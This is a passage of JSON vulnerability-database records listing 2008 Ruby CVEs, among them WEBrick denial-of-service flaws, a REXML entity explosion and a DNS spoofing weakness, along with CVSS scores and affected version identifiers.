dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 3, "modified": "2008-10-12T09:37:30", "published": "2008-10-12T09:37:30", "id": "DEBIAN:DSA-1651-1:0FC77", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2008/msg00243.html", "title": "[SECURITY] [DSA 1651-1] New ruby1.8 packages fix several vulnerabilities", "type": "debian", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "cve": [{"lastseen": "2020-10-03T11:51:02", "description": "httputils.rb in WEBrick in Ruby 1.8.1 and 1.8.5, as used in Red Hat Enterprise Linux 4 and 5, allows remote attackers to cause a denial of service (CPU consumption) via a crafted HTTP request. NOTE: this issue exists because of an incomplete fix for CVE-2008-3656.", "edition": 3, "cvss3": {}, "published": "2008-12-09T00:30:00", "title": "CVE-2008-4310", "type": "cve", "cwe": ["CWE-399"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-4310"], "modified": "2017-09-29T01:32:00", "cpe": ["cpe:/a:ruby-lang:ruby:1.8.1", "cpe:/a:ruby-lang:ruby:1.8.5"], "id": "CVE-2008-4310", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4310", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:a:ruby-lang:ruby:1.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.5:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:28:24", "description": "The dl module in Ruby 1.8.5 and earlier, 1.8.6 through 1.8.6-p286, 1.8.7 through 1.8.7-p71, and 1.9 through r18423 does not check \"taintness\" of inputs, which allows context-dependent attackers to bypass safe levels and execute dangerous functions by accessing a library using DL.dlopen.", "edition": 5, "cvss3": {}, "published": "2008-08-13T01:41:00", "title": "CVE-2008-3657", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-3657"], "modified": "2018-10-11T20:49:00", "cpe": ["cpe:/a:ruby-lang:ruby:1.8.3", "cpe:/a:ruby-lang:ruby:1.8.4", "cpe:/a:ruby-lang:ruby:1.8.2", "cpe:/a:ruby-lang:ruby:1.8.1", "cpe:/a:ruby-lang:ruby:1.6.8", "cpe:/a:ruby-lang:ruby:1.9.0", "cpe:/a:ruby-lang:ruby:1.8.6", "cpe:/a:ruby-lang:ruby:1.8.5", "cpe:/a:ruby-lang:ruby:1.8.7", "cpe:/a:ruby-lang:ruby:1.8.0"], "id": "CVE-2008-3657", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-3657", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:ruby-lang:ruby:1.8.6:preview2:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.5:preview2:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.7:preview1:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.9.0:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.4:preview1:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.7:p71:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.7:preview2:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.0:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.4:preview2:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.6:preview1:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.6:p114:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.3:preview2:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.5:p11:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.5:p2:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.3:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.5:preview3:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.6.8:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.5:preview4:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.3:preview3:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.4:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.7:preview3:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.7:p17:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.7:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.4:preview3:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.5:preview5:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.2:preview4:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.2:preview3:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.2:preview2:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.6:preview3:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.5:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.7:p22:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.5:p12:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.5:p113:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.5:p35:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.5:preview1:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.2:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.6:p110:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.3:preview1:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.7:preview4:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.6:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.5:p115:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.1:-9:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:28:24", "description": "Ruby 1.8.5 and earlier, 1.8.6 through 1.8.6-p286, 1.8.7 through 1.8.7-p71, and 1.9 through r18423 does not properly restrict access to critical variables and methods at various safe levels, which allows context-dependent attackers to bypass intended access restrictions via (1) untrace_var, (2) $PROGRAM_NAME, and (3) syslog at safe level 4, and (4) insecure methods at safe levels 1 through 3.", "edition": 5, "cvss3": {}, "published": "2008-08-13T01:41:00", "title": "CVE-2008-3655", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-3655"], "modified": "2018-10-11T20:48:00", "cpe": ["cpe:/a:ruby-lang:ruby:1.8.3", "cpe:/a:ruby-lang:ruby:1.8.4", "cpe:/a:ruby-lang:ruby:1.8.2", "cpe:/a:ruby-lang:ruby:1.8.1", "cpe:/a:ruby-lang:ruby:1.6.8", "cpe:/a:ruby-lang:ruby:1.9.0", "cpe:/a:ruby-lang:ruby:1.8.6", "cpe:/a:ruby-lang:ruby:1.8.5", "cpe:/a:ruby-lang:ruby:1.8.7", "cpe:/a:ruby-lang:ruby:1.8.0"], "id": "CVE-2008-3655", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-3655", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:ruby-lang:ruby:1.8.6:preview2:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.5:preview2:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.7:preview1:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.9.0:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.4:preview1:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.7:p71:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.7:preview2:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.0:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.4:preview2:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.6:preview1:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.6:p114:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.3:preview2:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.5:p11:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.5:p2:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.3:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.5:preview3:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.6.8:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.5:preview4:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.3:preview3:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.4:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.7:preview3:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.6:p286:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.7:p17:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.6:p36:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.7:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.4:preview3:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.5:preview5:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.6:p111:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.2:preview4:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.2:preview3:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.2:preview2:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.6:preview3:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.5:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.7:p22:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.5:p12:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.5:p113:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.5:p35:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.5:preview1:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.2:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.6:p230:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.6:p110:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.3:preview1:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.7:preview4:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.6:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.5:p115:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.1:-9:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T11:51:01", "description": "The REXML module in Ruby 1.8.6 through 1.8.6-p287, 1.8.7 through 1.8.7-p72, and 1.9 allows context-dependent attackers to cause a denial of service (CPU consumption) via an XML document with recursively nested entities, aka an \"XML entity explosion.\"", "edition": 3, "cvss3": {}, "published": "2008-08-27T20:41:00", "title": "CVE-2008-3790", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-3790"], "modified": "2018-10-03T21:55:00", "cpe": ["cpe:/a:ruby-lang:ruby:1.9", "cpe:/a:ruby-lang:ruby:1.8.6", "cpe:/a:ruby-lang:ruby:1.8.7"], "id": "CVE-2008-3790", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-3790", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:ruby-lang:ruby:1.8.6:preview2:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.7:preview1:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.7:p71:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.7:preview2:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.6:preview1:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.6:p114:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.7:p72:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.6:p287:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.9:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.7:preview3:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.6:p286:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.7:p17:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.6:p36:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.7:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.6:p111:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.6:preview3:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.7:p22:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.6:p230:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.6:p110:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.7:preview4:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.6:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T11:51:00", "description": "The regular expression engine (regex.c) in Ruby 1.8.5 and earlier, 1.8.6 through 1.8.6-p286, 1.8.7 through 1.8.7-p71, and 1.9 through r18423 allows remote attackers to cause a denial of service (infinite loop and crash) via multiple long requests to a Ruby socket, related to memory allocation failure, and as demonstrated against Webrick.", "edition": 3, "cvss3": {}, "published": "2008-08-14T23:41:00", "title": "CVE-2008-3443", "type": "cve", "cwe": ["CWE-399"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-3443"], "modified": "2018-10-03T21:55:00", "cpe": ["cpe:/a:ruby-lang:ruby:1.8.3", "cpe:/a:ruby-lang:ruby:1.8.4", "cpe:/a:ruby-lang:ruby:1.8.2", "cpe:/a:ruby-lang:ruby:1.8.1", "cpe:/a:ruby-lang:ruby:1.6.8", "cpe:/a:ruby-lang:ruby:1.9.0", "cpe:/a:ruby-lang:ruby:1.8.6", "cpe:/a:ruby-lang:ruby:1.8.5", "cpe:/a:ruby-lang:ruby:1.8.7", "cpe:/a:ruby-lang:ruby:1.8.0"], "id": "CVE-2008-3443", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-3443", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:ruby-lang:ruby:1.8.6:preview2:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.5:preview2:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.7:preview1:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.5:p52:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.9.0:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.4:preview1:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.7:p71:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.7:preview2:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.0:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.4:preview2:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.6:preview1:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.6:p114:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.5:p231:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.3:preview2:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.5:p11:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.5:p2:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.3:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.5:preview3:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.6.8:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.5:preview4:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.3:preview3:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.4:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.7:preview3:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.6:p286:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.5:p114:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.7:p17:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.6:p36:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.7:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.4:preview3:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.5:preview5:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.6:p111:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.2:preview4:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.9.0:r18423:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.2:preview3:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.2:preview2:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.6:preview3:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.5:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.7:p22:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.5:p12:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.5:p113:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.5:p35:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.5:preview1:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.2:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.6:p230:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.6:p110:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.3:preview1:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.7:preview4:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.6:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.5:p115:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.1:-9:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:28:24", "description": "Algorithmic complexity vulnerability in the WEBrick::HTTPUtils.split_header_value function in WEBrick::HTTP::DefaultFileHandler in WEBrick in Ruby 1.8.5 and earlier, 1.8.6 through 1.8.6-p286, 1.8.7 through 1.8.7-p71, and 1.9 through r18423 allows context-dependent attackers to cause a denial of service (CPU consumption) via a crafted HTTP request that is processed by a backtracking regular expression.", "edition": 5, "cvss3": {}, "published": "2008-08-13T01:41:00", "title": "CVE-2008-3656", "type": "cve", "cwe": ["CWE-399"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-3656"], "modified": "2018-10-11T20:48:00", "cpe": ["cpe:/a:ruby-lang:ruby:1.8.3", "cpe:/a:ruby-lang:ruby:1.8.4", "cpe:/a:ruby-lang:ruby:1.8.2", "cpe:/a:ruby-lang:ruby:1.8.1", "cpe:/a:ruby-lang:ruby:1.6.8", "cpe:/a:ruby-lang:ruby:1.9.0", "cpe:/a:ruby-lang:ruby:1.8.6", "cpe:/a:ruby-lang:ruby:1.8.5", "cpe:/a:ruby-lang:ruby:1.8.7", "cpe:/a:ruby-lang:ruby:1.8.0"], "id": "CVE-2008-3656", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-3656", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:a:ruby-lang:ruby:1.8.6:preview2:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.5:preview2:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.7:preview1:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.9.0:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.4:preview1:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.7:p71:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.7:preview2:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.0:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.4:preview2:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.6:preview1:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.6:p114:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.3:preview2:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.5:p11:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.5:p2:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.3:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.5:preview3:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.6.8:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.5:preview4:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.3:preview3:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.4:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.7:preview3:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.7:p17:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.7:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.4:preview3:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.5:preview5:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.2:preview4:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.2:preview3:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.2:preview2:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.6:preview3:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.5:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.7:p22:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.5:p12:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.5:p113:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.5:p35:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.5:preview1:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.2:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.6:p110:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.3:preview1:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.7:preview4:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.6:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.5:p115:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.1:-9:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:28:24", "description": "resolv.rb in Ruby 1.8.5 and earlier, 1.8.6 before 1.8.6-p287, 1.8.7 before 1.8.7-p72, and 1.9 r18423 and earlier uses sequential transaction IDs and constant source ports for DNS requests, which makes it easier for remote attackers to spoof DNS responses, a different vulnerability than CVE-2008-1447.", "edition": 5, "cvss3": {}, "published": "2008-09-04T17:41:00", "title": "CVE-2008-3905", "type": "cve", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-3905"], "modified": "2018-10-03T21:55:00", "cpe": ["cpe:/a:ruby-lang:ruby:1.8.3", "cpe:/a:ruby-lang:ruby:1.8.4", "cpe:/a:ruby-lang:ruby:1.8.2", "cpe:/a:ruby-lang:ruby:1.8.1", "cpe:/a:ruby-lang:ruby:1.9", "cpe:/a:ruby-lang:ruby:1.6", 